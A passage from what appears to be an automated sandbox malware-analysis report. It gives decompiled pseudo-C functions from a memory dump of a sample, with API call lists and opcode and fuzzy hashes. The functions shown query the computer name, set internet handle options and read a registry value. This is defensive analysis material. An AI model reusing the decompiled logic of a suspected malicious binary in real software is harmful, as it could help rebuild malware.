                                                                                                                          									goto L18;
                                                                                                                          								} else {
                                                                                                                          									_a4 = 0x800100;
                                                                                                                          									_t56 = E04CD1922(_t40,  *((intOrPtr*)(_t66 + 4)));
                                                                                                                          									if(_t56 == 0) {
                                                                                                                          										goto L18;
                                                                                                                          									} else {
                                                                                                                          										_t42 =  *0x4cdd2e0; // 0xbda5a8
                                                                                                                          										_t19 = _t42 + 0x4cde758; // 0x450047
                                                                                                                          										_t43 = _t19;
                                                                                                                          										__imp__( *((intOrPtr*)(_t66 + 0x14)), _t43, _t56, 0, 0, 0, _a4); // executed
                                                                                                                          										 *((intOrPtr*)(_t66 + 0x18)) = _t43;
                                                                                                                          										E04CD4AAB(_t56);
                                                                                                                          										_t45 =  *((intOrPtr*)(_t66 + 0x18));
                                                                                                                          										if(_t45 == 0) {
                                                                                                                          											goto L18;
                                                                                                                          										} else {
                                                                                                                          											_t57 = 4;
                                                                                                                          											_v12 = _t57;
                                                                                                                          											__imp__(_t45, 0x1f,  &_a4,  &_v12);
                                                                                                                          											if(_t45 != 0) {
                                                                                                                          												_a4 = _a4 | 0x00000100;
                                                                                                                          												 *_t65( *((intOrPtr*)(_t66 + 0x18)), 0x1f,  &_a4, _t57);
                                                                                                                          											}
                                                                                                                          											_push(_t57);
                                                                                                                          											_push( &_a8);
                                                                                                                          											_push(6);
                                                                                                                          											_push( *((intOrPtr*)(_t66 + 0x18)));
                                                                                                                          											if( *_t65() == 0) {
                                                                                                                          												goto L18;
                                                                                                                          											} else {
                                                                                                                          												_push(_t57);
                                                                                                                          												_push( &_a8);
                                                                                                                          												_push(5);
                                                                                                                          												_push( *((intOrPtr*)(_t66 + 0x18)));
                                                                                                                          												if( *_t65() == 0) {
                                                                                                                          													goto L18;
                                                                                                                          												} else {
                                                                                                                          													_t36 = 0;
                                                                                                                          												}
                                                                                                                          											}
                                                                                                                          										}
                                                                                                                          									}
                                                                                                                          								}
                                                                                                                          							} else {
                                                                                                                          								_t39 =  *_t65( *(_t66 + 0x10), 3,  &_a8, 4);
                                                                                                                          								if(_t39 == 0) {
                                                                                                                          									goto L18;
                                                                                                                          								} else {
                                                                                                                          									goto L10;
                                                                                                                          								}
                                                                                                                          							}
                                                                                                                          						}
                                                                                                                          					}
                                                                                                                          				}
                                                                                                                          				return _t36;
                                                                                                                          			}




















                                                                                                                          0x04cd782e
                                                                                                                          0x04cd7831
                                                                                                                          0x04cd7836
                                                                                                                          0x04cd783b
                                                                                                                          0x00000000
                                                                                                                          0x04cd783d
                                                                                                                          0x04cd783f
                                                                                                                          0x04cd784b
                                                                                                                          0x04cd784e
                                                                                                                          0x04cd7856
                                                                                                                          0x04cd7858
                                                                                                                          0x04cd7869
                                                                                                                          0x04cd7869
                                                                                                                          0x04cd786b
                                                                                                                          0x04cd786f
                                                                                                                          0x04cd7870
                                                                                                                          0x04cd7872
                                                                                                                          0x04cd7879
                                                                                                                          0x00000000
                                                                                                                          0x04cd787b
                                                                                                                          0x04cd787b
                                                                                                                          0x04cd787f
                                                                                                                          0x04cd7880
                                                                                                                          0x04cd7882
                                                                                                                          0x04cd7889
                                                                                                                          0x00000000
                                                                                                                          0x04cd788b
                                                                                                                          0x04cd788b
                                                                                                                          0x04cd788b
                                                                                                                          0x04cd7889
                                                                                                                          0x04cd7879
                                                                                                                          0x04cd783b
                                                                                                                          0x04cd780f
                                                                                                                          0x04cd77bf
                                                                                                                          0x04cd77ca
                                                                                                                          0x04cd77ce
                                                                                                                          0x00000000
                                                                                                                          0x00000000
                                                                                                                          0x00000000
                                                                                                                          0x00000000
                                                                                                                          0x04cd77ce
                                                                                                                          0x04cd77bd
                                                                                                                          0x04cd77ae
                                                                                                                          0x04cd779c
                                                                                                                          0x04cd7898

                                                                                                                          APIs
                                                                                                                            • Part of subcall function 04CD1922: lstrlen.KERNEL32(?,00000000,058B9B38,00000000,04CD74FF,058B9D16,?,?,?,?,?,69B25F44,00000005,04CDD00C), ref: 04CD1929
                                                                                                                            • Part of subcall function 04CD1922: mbstowcs.NTDLL ref: 04CD1952
                                                                                                                            • Part of subcall function 04CD1922: memset.NTDLL ref: 04CD1964
                                                                                                                          • GetVersion.KERNEL32(00000000,0000EA60,00000008,?,?,?,04CD544C,00000000,00000000,058B9618,?,?,04CD2A8A,?,058B9618,0000EA60), ref: 04CD7764
                                                                                                                          • GetLastError.KERNEL32(00000000,0000EA60,00000008,?,?,?,04CD544C,00000000,00000000,058B9618,?,?,04CD2A8A,?,058B9618,0000EA60), ref: 04CD788F
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 00000003.00000002.1186676495.0000000004CD1000.00000020.00020000.sdmp, Offset: 04CD0000, based on PE: true
                                                                                                                          • Associated: 00000003.00000002.1186632523.0000000004CD0000.00000004.00020000.sdmp
                                                                                                                          • Associated: 00000003.00000002.1186738951.0000000004CDC000.00000002.00020000.sdmp
                                                                                                                          • Associated: 00000003.00000002.1186771530.0000000004CDD000.00000004.00020000.sdmp
                                                                                                                          • Associated: 00000003.00000002.1186799426.0000000004CDF000.00000002.00020000.sdmp
                                                                                                                          Similarity
                                                                                                                          • API ID: ErrorLastVersionlstrlenmbstowcsmemset
                                                                                                                          • String ID:
                                                                                                                          • API String ID: 4097109750-0
                                                                                                                          • Opcode ID: 79d55b032b21d07beb53a9fa43b5d717c78b5aacfe13b5f8dff2fe5b6fabf207
                                                                                                                          • Instruction ID: f3cddb28f2cf22d971158b1af0d18d2cb9795eb891bdaed0dec47cf72e77cf70
                                                                                                                          • Opcode Fuzzy Hash: 79d55b032b21d07beb53a9fa43b5d717c78b5aacfe13b5f8dff2fe5b6fabf207
                                                                                                                          • Instruction Fuzzy Hash: FC416D76501208BFEB259FA0DC85EAA7BBEEB04740F044939F742A6090E771EE44DB60
                                                                                                                          Uniqueness

                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                          C-Code - Quality: 75%
                                                                                                                          			E04CD144D(void* __ecx, void* _a4, intOrPtr _a8, char _a12, intOrPtr _a16, char _a20, intOrPtr _a24, intOrPtr* _a28) {
                                                                                                                          				void* _v8;
                                                                                                                          				void* __esi;
                                                                                                                          				intOrPtr* _t35;
                                                                                                                          				void* _t40;
                                                                                                                          				intOrPtr* _t41;
                                                                                                                          				intOrPtr* _t43;
                                                                                                                          				intOrPtr* _t45;
                                                                                                                          				intOrPtr* _t50;
                                                                                                                          				intOrPtr* _t52;
                                                                                                                          				void* _t54;
                                                                                                                          				intOrPtr* _t55;
                                                                                                                          				intOrPtr* _t57;
                                                                                                                          				intOrPtr* _t61;
                                                                                                                          				intOrPtr* _t65;
                                                                                                                          				intOrPtr _t68;
                                                                                                                          				void* _t72;
                                                                                                                          				void* _t75;
                                                                                                                          				void* _t76;
                                                                                                                          
                                                                                                                          				_t55 = _a4;
                                                                                                                          				_t35 =  *((intOrPtr*)(_t55 + 4));
                                                                                                                          				_a4 = 0;
                                                                                                                          				_t76 =  *((intOrPtr*)( *_t35 + 0x4c))(_t35, _a16, 0,  &_v8, 0, _t72, _t75, _t54, __ecx, __ecx);
                                                                                                                          				if(_t76 < 0) {
                                                                                                                          					L18:
                                                                                                                          					return _t76;
                                                                                                                          				}
                                                                                                                          				_t40 = E04CD3DA0(_v8, _a8, _a12, _a20,  &_a20,  &_a12); // executed
                                                                                                                          				_t76 = _t40;
                                                                                                                          				if(_t76 >= 0) {
                                                                                                                          					_t61 = _a28;
                                                                                                                          					if(_t61 != 0 &&  *_t61 != 0) {
                                                                                                                          						_t52 = _v8;
                                                                                                                          						_t76 =  *((intOrPtr*)( *_t52 + 0x14))(_t52, _a24, 0, _t61, 0);
                                                                                                                          					}
                                                                                                                          					if(_t76 >= 0) {
                                                                                                                          						_t43 =  *_t55;
                                                                                                                          						_t68 =  *0x4cdd2e0; // 0xbda5a8
                                                                                                                          						_t20 = _t68 + 0x4cde1fc; // 0x740053
                                                                                                                          						_t76 =  *((intOrPtr*)( *_t43 + 0x60))(_t43, _t20, _a16, 0, 0, _v8,  &_a4, 0);
                                                                                                                          						if(_t76 >= 0) {
                                                                                                                          							_t76 = E04CD47EB(_a4);
                                                                                                                          							if(_t76 >= 0) {
                                                                                                                          								_t65 = _a28;
                                                                                                                          								if(_t65 != 0 &&  *_t65 == 0) {
                                                                                                                          									_t50 = _a4;
                                                                                                                          									_t76 =  *((intOrPtr*)( *_t50 + 0x10))(_t50, _a24, 0, _t65, 0, 0);
                                                                                                                          								}
                                                                                                                          							}
                                                                                                                          						}
                                                                                                                          						_t45 = _a4;
                                                                                                                          						if(_t45 != 0) {
                                                                                                                          							 *((intOrPtr*)( *_t45 + 8))(_t45);
                                                                                                                          						}
                                                                                                                          						_t57 = __imp__#6;
                                                                                                                          						if(_a20 != 0) {
                                                                                                                          							 *_t57(_a20);
                                                                                                                          						}
                                                                                                                          						if(_a12 != 0) {
                                                                                                                          							 *_t57(_a12);
                                                                                                                          						}
                                                                                                                          					}
                                                                                                                          				}
                                                                                                                          				_t41 = _v8;
                                                                                                                          				 *((intOrPtr*)( *_t41 + 8))(_t41);
                                                                                                                          				goto L18;
                                                                                                                          			}






















                                                                                                                          APIs
                                                                                                                            • Part of subcall function 04CD3DA0: SysAllocString.OLEAUT32(80000002), ref: 04CD3DFD
                                                                                                                            • Part of subcall function 04CD3DA0: SysFreeString.OLEAUT32(00000000), ref: 04CD3E63
                                                                                                                          • SysFreeString.OLEAUT32(?), ref: 04CD152C
                                                                                                                          • SysFreeString.OLEAUT32(04CD28D9), ref: 04CD1536
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 00000003.00000002.1186676495.0000000004CD1000.00000020.00020000.sdmp, Offset: 04CD0000, based on PE: true
                                                                                                                          • Associated: 00000003.00000002.1186632523.0000000004CD0000.00000004.00020000.sdmp
                                                                                                                          • Associated: 00000003.00000002.1186738951.0000000004CDC000.00000002.00020000.sdmp
                                                                                                                          • Associated: 00000003.00000002.1186771530.0000000004CDD000.00000004.00020000.sdmp
                                                                                                                          • Associated: 00000003.00000002.1186799426.0000000004CDF000.00000002.00020000.sdmp
                                                                                                                          Similarity
                                                                                                                          • API ID: String$Free$Alloc
                                                                                                                          • String ID:
                                                                                                                          • API String ID: 986138563-0
                                                                                                                          • Opcode ID: eba46556b3ca42fb98027dc1b19c93940ca1c2774845fc1d1c5dfd49ef9a2328
                                                                                                                          • Instruction ID: 2123cee3138b8956a0f2bd5a1897e1c328c687478ef1726838796b6b05cf6a2e
                                                                                                                          • Opcode Fuzzy Hash: eba46556b3ca42fb98027dc1b19c93940ca1c2774845fc1d1c5dfd49ef9a2328
                                                                                                                          • Instruction Fuzzy Hash: AE317076500119EFCB11DF64CC88C9BBB7AFFC9750B144698F9069B210E635ED51DBA0
                                                                                                                          Uniqueness

                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                          C-Code - Quality: 100%
                                                                                                                          			E04CD117A(void* __ecx, void* __edx, void* __eflags, intOrPtr _a4, intOrPtr _a8, intOrPtr _a12, signed int _a16) {
                                                                                                                          				struct _FILETIME _v12;
                                                                                                                          				signed int _t11;
                                                                                                                          				void* _t16;
                                                                                                                          				short _t19;
                                                                                                                          				void* _t22;
                                                                                                                          				void* _t24;
                                                                                                                          				void* _t25;
                                                                                                                          				short* _t26;
                                                                                                                          
                                                                                                                          				_t24 = __edx;
                                                                                                                          				_t25 = E04CD1922(_t11, _a12);
                                                                                                                          				if(_t25 == 0) {
                                                                                                                          					_t22 = 8;
                                                                                                                          				} else {
                                                                                                                          					_t26 = _t25 + _a16 * 2;
                                                                                                                          					 *_t26 = 0; // executed
                                                                                                                          					_t16 = E04CD9371(__ecx, _a4, _a8, _t25); // executed
                                                                                                                          					_t22 = _t16;
                                                                                                                          					if(_t22 == 0) {
                                                                                                                          						GetSystemTimeAsFileTime( &_v12);
                                                                                                                          						_t19 = 0x5f;
                                                                                                                          						 *_t26 = _t19;
                                                                                                                          						_t22 = E04CD4A6D(_t24, _a4, 0x80000001, _a8, _t25,  &_v12, 8);
                                                                                                                          					}
                                                                                                                          					HeapFree( *0x4cdd270, 0, _t25);
                                                                                                                          				}
                                                                                                                          				return _t22;
                                                                                                                          			}












                                                                                                                          APIs
                                                                                                                            • Part of subcall function 04CD1922: lstrlen.KERNEL32(?,00000000,058B9B38,00000000,04CD74FF,058B9D16,?,?,?,?,?,69B25F44,00000005,04CDD00C), ref: 04CD1929
                                                                                                                            • Part of subcall function 04CD1922: mbstowcs.NTDLL ref: 04CD1952
                                                                                                                            • Part of subcall function 04CD1922: memset.NTDLL ref: 04CD1964
                                                                                                                          • GetSystemTimeAsFileTime.KERNEL32(004F0053,004F0053,00000014,00000000,00000008,00000000,73B75520,00000008,00000014,004F0053,058B9364), ref: 04CD11B2
                                                                                                                          • HeapFree.KERNEL32(00000000,00000000,004F0053,00000014,00000000,00000008,00000000,73B75520,00000008,00000014,004F0053,058B9364), ref: 04CD11E0
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 00000003.00000002.1186676495.0000000004CD1000.00000020.00020000.sdmp, Offset: 04CD0000, based on PE: true
                                                                                                                          • Associated: 00000003.00000002.1186632523.0000000004CD0000.00000004.00020000.sdmp
                                                                                                                          • Associated: 00000003.00000002.1186738951.0000000004CDC000.00000002.00020000.sdmp
                                                                                                                          • Associated: 00000003.00000002.1186771530.0000000004CDD000.00000004.00020000.sdmp
                                                                                                                          • Associated: 00000003.00000002.1186799426.0000000004CDF000.00000002.00020000.sdmp
                                                                                                                          Similarity
                                                                                                                          • API ID: Time$FileFreeHeapSystemlstrlenmbstowcsmemset
                                                                                                                          • String ID:
                                                                                                                          • API String ID: 1500278894-0
                                                                                                                          • Opcode ID: 6070101c27dd6dd101e6a04616aa8e11464d76aafcacf33fd5c63d204e5fe8e7
                                                                                                                          • Instruction ID: 55424b526e38a6d7156670990843c8245b120defb6714c8307fafc7692aa6281
                                                                                                                          • Opcode Fuzzy Hash: 6070101c27dd6dd101e6a04616aa8e11464d76aafcacf33fd5c63d204e5fe8e7
                                                                                                                          • Instruction Fuzzy Hash: C7018F3A210209BBEF216FA5DC44FAF7B7AFF89754F40402AFB409A161DA71EA14D750
                                                                                                                          Uniqueness

                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                          C-Code - Quality: 37%
                                                                                                                          			E04CD1BBF(void* __ecx) {
                                                                                                                          				signed int _v8;
                                                                                                                          				void* _t15;
                                                                                                                          				void* _t19;
                                                                                                                          				void* _t20;
                                                                                                                          				void* _t22;
                                                                                                                          				intOrPtr* _t23;
                                                                                                                          
                                                                                                                          				_t23 = __imp__;
                                                                                                                          				_t20 = 0;
                                                                                                                          				_v8 = _v8 & 0;
                                                                                                                          				 *_t23(3, 0,  &_v8, _t19, _t22, __ecx); // executed
                                                                                                                          				_t10 = _v8;
                                                                                                                          				if(_v8 != 0) {
                                                                                                                          					_t20 = E04CD75F6(_t10 + 1);
                                                                                                                          					if(_t20 != 0) {
                                                                                                                          						_t15 =  *_t23(3, _t20,  &_v8); // executed
                                                                                                                          						if(_t15 != 0) {
                                                                                                                          							 *((char*)(_v8 + _t20)) = 0;
                                                                                                                          						} else {
                                                                                                                          							E04CD4AAB(_t20);
                                                                                                                          							_t20 = 0;
                                                                                                                          						}
                                                                                                                          					}
                                                                                                                          				}
                                                                                                                          				return _t20;
                                                                                                                          			}










                                                                                                                          APIs
                                                                                                                          • GetComputerNameExA.KERNEL32(00000003,00000000,04CD4531,73BCF710,00000000,?,?,04CD4531), ref: 04CD1BD7
                                                                                                                            • Part of subcall function 04CD75F6: RtlAllocateHeap.NTDLL(00000000,00000000,04CD4F70), ref: 04CD7602
                                                                                                                          • GetComputerNameExA.KERNEL32(00000003,00000000,04CD4531,04CD4532,?,?,04CD4531), ref: 04CD1BF4
                                                                                                                            • Part of subcall function 04CD4AAB: RtlFreeHeap.NTDLL(00000000,00000000,04CD5012,00000000,?,?,00000000), ref: 04CD4AB7
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 00000003.00000002.1186676495.0000000004CD1000.00000020.00020000.sdmp, Offset: 04CD0000, based on PE: true
                                                                                                                          • Associated: 00000003.00000002.1186632523.0000000004CD0000.00000004.00020000.sdmp
                                                                                                                          • Associated: 00000003.00000002.1186738951.0000000004CDC000.00000002.00020000.sdmp
                                                                                                                          • Associated: 00000003.00000002.1186771530.0000000004CDD000.00000004.00020000.sdmp
                                                                                                                          • Associated: 00000003.00000002.1186799426.0000000004CDF000.00000002.00020000.sdmp
                                                                                                                          Similarity
                                                                                                                          • API ID: ComputerHeapName$AllocateFree
                                                                                                                          • String ID:
                                                                                                                          • API String ID: 187446995-0
                                                                                                                          • Opcode ID: 7389cdf8aa8e51f98399c169bf31d0126e55fbd30f70be88be12b07ec9396033
                                                                                                                          • Instruction ID: cfb7c5e506dca56c6d0d7a24abb8f8f873f3831834573fa1db6c66cea3a4ddc6
                                                                                                                          • Opcode Fuzzy Hash: 7389cdf8aa8e51f98399c169bf31d0126e55fbd30f70be88be12b07ec9396033
                                                                                                                          • Instruction Fuzzy Hash: BBF05E2A604109BEEB11D6AA8D40FAF7BFEDBC5655F19006AEB05D7140EA70EF029770
                                                                                                                          Uniqueness

                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                          C-Code - Quality: 100%
                                                                                                                          			_entry_(intOrPtr _a4, intOrPtr _a8) {
                                                                                                                          				intOrPtr _t4;
                                                                                                                          				void* _t10;
                                                                                                                          				void* _t11;
                                                                                                                          				void* _t12;
                                                                                                                          				void* _t14;
                                                                                                                          
                                                                                                                          				_t14 = 1;
                                                                                                                          				_t4 = _a8;
                                                                                                                          				if(_t4 == 0) {
                                                                                                                          					if(InterlockedDecrement(0x4cdd274) == 0) {
                                                                                                                          						E04CD4450();
                                                                                                                          					}
                                                                                                                          				} else {
                                                                                                                          					if(_t4 == 1 && InterlockedIncrement(0x4cdd274) == 1) {
                                                                                                                          						_t10 = E04CD262F(_t11, _t12, _a4); // executed
                                                                                                                          						if(_t10 != 0) {
                                                                                                                          							_t14 = 0;
                                                                                                                          						}
                                                                                                                          					}
                                                                                                                          				}
                                                                                                                          				return _t14;
                                                                                                                          			}









                                                                                                                          APIs
                                                                                                                          • InterlockedIncrement.KERNEL32(04CDD274), ref: 04CD18ED
                                                                                                                            • Part of subcall function 04CD262F: HeapCreate.KERNEL32(00000000,00400000,00000000,?,00000001,?,?,?,04CD1900,?), ref: 04CD2642
                                                                                                                          • InterlockedDecrement.KERNEL32(04CDD274), ref: 04CD190D
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 00000003.00000002.1186676495.0000000004CD1000.00000020.00020000.sdmp, Offset: 04CD0000, based on PE: true
                                                                                                                          • Associated: 00000003.00000002.1186632523.0000000004CD0000.00000004.00020000.sdmp
                                                                                                                          • Associated: 00000003.00000002.1186738951.0000000004CDC000.00000002.00020000.sdmp
                                                                                                                          • Associated: 00000003.00000002.1186771530.0000000004CDD000.00000004.00020000.sdmp
                                                                                                                          • Associated: 00000003.00000002.1186799426.0000000004CDF000.00000002.00020000.sdmp
                                                                                                                          Similarity
                                                                                                                          • API ID: Interlocked$CreateDecrementHeapIncrement
                                                                                                                          • String ID:
                                                                                                                          • API String ID: 3834848776-0
                                                                                                                          • Opcode ID: 447362f0805ecbb04d61ab7aca82a080036f5dbc5f8b531ebe2b7a53271584e0
                                                                                                                          • Instruction ID: b528cbc011a91f01f48e7e5519b02d42b1f749cf99ecd41292085c7096ad52d4
                                                                                                                          • Opcode Fuzzy Hash: 447362f0805ecbb04d61ab7aca82a080036f5dbc5f8b531ebe2b7a53271584e0
                                                                                                                          • Instruction Fuzzy Hash: 96E0DF39340222A79B313E70A80476BAB03AB007A4F084122E781C102DDA10FAC3D691
                                                                                                                          Uniqueness

                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                          C-Code - Quality: 32%
                                                                                                                          			E04CD1F72(intOrPtr _a4, signed int _a8) {
                                                                                                                          				long _v8;
                                                                                                                          				long _v12;
                                                                                                                          				char _v16;
                                                                                                                          				void* _t14;
                                                                                                                          				long _t15;
                                                                                                                          				char* _t17;
                                                                                                                          				intOrPtr* _t19;
                                                                                                                          				signed int _t22;
                                                                                                                          
                                                                                                                          				_t19 = __imp__; // 0x6f5ee700
                                                                                                                          				_t22 =  ~_a8;
                                                                                                                          				_v12 = 0;
                                                                                                                          				asm("sbb esi, esi");
                                                                                                                          				while(1) {
                                                                                                                          					_v8 = 0;
                                                                                                                          					_t14 =  *_t19(_a4, _a8, _t22, 0, 0, 0, 0); // executed
                                                                                                                          					if(_t14 != 0) {
                                                                                                                          						break;
                                                                                                                          					}
                                                                                                                          					_t15 = GetLastError();
                                                                                                                          					_v8 = _t15;
                                                                                                                          					if(_t15 != 0x2f8f) {
                                                                                                                          						if(_t15 == 0x2f00) {
                                                                                                                          							continue;
                                                                                                                          						}
                                                                                                                          					} else {
                                                                                                                          						_v16 = 0x3300;
                                                                                                                          						if(_v12 == 0) {
                                                                                                                          							_t17 =  &_v16;
                                                                                                                          							__imp__(_a4, 0x1f, _t17, 4);
                                                                                                                          							if(_t17 == 0) {
                                                                                                                          								_v8 = GetLastError();
                                                                                                                          							} else {
                                                                                                                          								_v12 = 1;
                                                                                                                          								continue;
                                                                                                                          							}
                                                                                                                          						}
                                                                                                                          					}
                                                                                                                          					L9:
                                                                                                                          					return _v8;
                                                                                                                          				}
                                                                                                                          				goto L9;
                                                                                                                          			}












                                                                                                                          APIs
                                                                                                                          • GetLastError.KERNEL32 ref: 04CD1F8F
                                                                                                                          • GetLastError.KERNEL32(?,?,?,?,04CD46B9,00000000,?,?), ref: 04CD1FE6
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 00000003.00000002.1186676495.0000000004CD1000.00000020.00020000.sdmp, Offset: 04CD0000, based on PE: true
                                                                                                                          • Associated: 00000003.00000002.1186632523.0000000004CD0000.00000004.00020000.sdmp
                                                                                                                          • Associated: 00000003.00000002.1186738951.0000000004CDC000.00000002.00020000.sdmp
                                                                                                                          • Associated: 00000003.00000002.1186771530.0000000004CDD000.00000004.00020000.sdmp
                                                                                                                          • Associated: 00000003.00000002.1186799426.0000000004CDF000.00000002.00020000.sdmp
                                                                                                                          Similarity
                                                                                                                          • API ID: ErrorLast
                                                                                                                          • String ID:
                                                                                                                          • API String ID: 1452528299-0
                                                                                                                          • Opcode ID: c2fafa8a9c43ec8c07e2b52e3208d9ca6249022353f5ffcb7fefd3e90c1ffa78
                                                                                                                          • Instruction ID: 5b3a62f908fd064683c27a52261e39c6caa7a400c2220a3633ee77d7d69e0a1c
                                                                                                                          • Opcode Fuzzy Hash: c2fafa8a9c43ec8c07e2b52e3208d9ca6249022353f5ffcb7fefd3e90c1ffa78
                                                                                                                          • Instruction Fuzzy Hash: 5F015275904208FBDF149FD6D848EAEBFBAEB84750F148066E601E2244DB74EB44DB60
                                                                                                                          Uniqueness

                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                          C-Code - Quality: 34%
                                                                                                                          			E04CD1E47(intOrPtr _a4, intOrPtr _a8, intOrPtr _a12, intOrPtr* _a16) {
                                                                                                                          				intOrPtr _v12;
                                                                                                                          				void* _v18;
                                                                                                                          				char _v20;
                                                                                                                          				intOrPtr _t15;
                                                                                                                          				void* _t17;
                                                                                                                          				intOrPtr _t19;
                                                                                                                          				void* _t23;
                                                                                                                          
                                                                                                                          				_v20 = 0;
                                                                                                                          				asm("stosd");
                                                                                                                          				asm("stosd");
                                                                                                                          				asm("stosd");
                                                                                                                          				asm("stosw");
                                                                                                                          				_t15 =  *0x4cdd2e0; // 0xbda5a8
                                                                                                                          				_t4 = _t15 + 0x4cde39c; // 0x58b8944
                                                                                                                          				_t20 = _t4;
                                                                                                                          				_t6 = _t15 + 0x4cde124; // 0x650047
                                                                                                                          				_t17 = E04CD144D(_t4, _a4, 0x80000002, _a8, _t6, _a12, _t4,  &_v20); // executed
                                                                                                                          				if(_t17 < 0) {
                                                                                                                          					_t23 = _t17;
                                                                                                                          				} else {
                                                                                                                          					_t23 = 8;
                                                                                                                          					if(_v20 != _t23) {
                                                                                                                          						_t23 = 1;
                                                                                                                          					} else {
                                                                                                                          						_t19 = E04CD25D6(_t20, _v12);
                                                                                                                          						if(_t19 != 0) {
                                                                                                                          							 *_a16 = _t19;
                                                                                                                          							_t23 = 0;
                                                                                                                          						}
                                                                                                                          						__imp__#6(_v12);
                                                                                                                          					}
                                                                                                                          				}
                                                                                                                          				return _t23;
                                                                                                                          			}











                                                                                                                          APIs
                                                                                                                            • Part of subcall function 04CD144D: SysFreeString.OLEAUT32(?), ref: 04CD152C
                                                                                                                            • Part of subcall function 04CD25D6: lstrlenW.KERNEL32(004F0053,00000000,00000000,?,?,04CD474F,004F0053,00000000,?), ref: 04CD25DF
                                                                                                                            • Part of subcall function 04CD25D6: memcpy.NTDLL(00000000,004F0053,?,?,00000002,?,?,04CD474F,004F0053,00000000,?), ref: 04CD2609
                                                                                                                            • Part of subcall function 04CD25D6: memset.NTDLL ref: 04CD261D
                                                                                                                          • SysFreeString.OLEAUT32(00000000), ref: 04CD1EAA
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 00000003.00000002.1186676495.0000000004CD1000.00000020.00020000.sdmp, Offset: 04CD0000, based on PE: true
                                                                                                                          • Associated: 00000003.00000002.1186632523.0000000004CD0000.00000004.00020000.sdmp
                                                                                                                          • Associated: 00000003.00000002.1186738951.0000000004CDC000.00000002.00020000.sdmp
                                                                                                                          • Associated: 00000003.00000002.1186771530.0000000004CDD000.00000004.00020000.sdmp
                                                                                                                          • Associated: 00000003.00000002.1186799426.0000000004CDF000.00000002.00020000.sdmp
                                                                                                                          Similarity
                                                                                                                          • API ID: FreeString$lstrlenmemcpymemset
                                                                                                                          • String ID:
                                                                                                                          • API String ID: 397948122-0
                                                                                                                          • Opcode ID: 696a210ec3bc15bd49b139a73b6816b68150bfc531ecd9b39ba6c2a81d80cfeb
                                                                                                                          • Instruction ID: 8066262a39dbe9303c78c3eec322a5212936ebfe25c8cc2166f74f7c891494db
                                                                                                                          • Opcode Fuzzy Hash: 696a210ec3bc15bd49b139a73b6816b68150bfc531ecd9b39ba6c2a81d80cfeb
                                                                                                                          • Instruction Fuzzy Hash: A1015E32900129BBDB119FA9DD08DABBBBAFB45254F044125EA05A71A0EB70EA11D791
                                                                                                                          Uniqueness

                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                          APIs
                                                                                                                          • RtlAllocateHeap.NTDLL(00000008,6E37A0D4,00000000), ref: 6E3314AF
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 00000003.00000002.1187430880.000000006E2E0000.00000020.00020000.sdmp, Offset: 6E2E0000, based on PE: false
                                                                                                                          Similarity
                                                                                                                          • API ID: AllocateHeap
                                                                                                                          • String ID:
                                                                                                                          • API String ID: 1279760036-0
                                                                                                                          • Opcode ID: cf552e4b66afef2b4d066361ed64c02923e6b11188e67a92507467a9e7060a68
                                                                                                                          • Instruction ID: 73138140f62963347e06a06282698952157d29e249489822e9452f472235796e
                                                                                                                          • Opcode Fuzzy Hash: cf552e4b66afef2b4d066361ed64c02923e6b11188e67a92507467a9e7060a68
                                                                                                                          • Instruction Fuzzy Hash: 10F0E9316049B56BEB415AF69815F9B377CAF82770B31C521AC98DA184CB31D80982F0
                                                                                                                          Uniqueness

                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                          APIs
                                                                                                                          • RtlEncodePointer.NTDLL(?), ref: 6E2F5C69
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 00000003.00000002.1187430880.000000006E2E0000.00000020.00020000.sdmp, Offset: 6E2E0000, based on PE: false
                                                                                                                          Similarity
                                                                                                                          • API ID: EncodePointer
                                                                                                                          • String ID:
                                                                                                                          • API String ID: 2118026453-0
                                                                                                                          • Opcode ID: 0ea5e33b30c0815d19cb1c81db660cef27284e855ba988fb774583ac02382796
                                                                                                                          • Instruction ID: 95a0dd9ea923f1d755e8c6bc88f0e504581320b50beece006e92090b248a883c
                                                                                                                          • Opcode Fuzzy Hash: 0ea5e33b30c0815d19cb1c81db660cef27284e855ba988fb774583ac02382796
                                                                                                                          • Instruction Fuzzy Hash: 7DD0C970008E24DFDF05AF54E8147A43BFCF706306F1004A8E40D83694DB319460CA4C
                                                                                                                          Uniqueness

                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                          C-Code - Quality: 100%
                                                                                                                          			E04CDAB16() {
                                                                                                                          
                                                                                                                          				E04CDABF6(0x4cdc344, 0x4cdd124); // executed
                                                                                                                          				goto __eax;
                                                                                                                          			}



                                                                                                                          0x04cdab28
                                                                                                                          0x04cdab2f

                                                                                                                          APIs
                                                                                                                          • ___delayLoadHelper2@8.DELAYIMP ref: 04CDAB28
                                                                                                                            • Part of subcall function 04CDABF6: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 04CDAC6F
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 00000003.00000002.1186676495.0000000004CD1000.00000020.00020000.sdmp, Offset: 04CD0000, based on PE: true
                                                                                                                          • Associated: 00000003.00000002.1186632523.0000000004CD0000.00000004.00020000.sdmp
                                                                                                                          • Associated: 00000003.00000002.1186738951.0000000004CDC000.00000002.00020000.sdmp
                                                                                                                          • Associated: 00000003.00000002.1186771530.0000000004CDD000.00000004.00020000.sdmp
                                                                                                                          • Associated: 00000003.00000002.1186799426.0000000004CDF000.00000002.00020000.sdmp
                                                                                                                          Similarity
                                                                                                                          • API ID: ExceptionHelper2@8LoadRaise___delay
                                                                                                                          • String ID:
                                                                                                                          • API String ID: 123106877-0
                                                                                                                          • Opcode ID: 656c7bc4374c9f09022c7a9bed8e03b1accd9087c7f46ce1c7085cd4c3b113e6
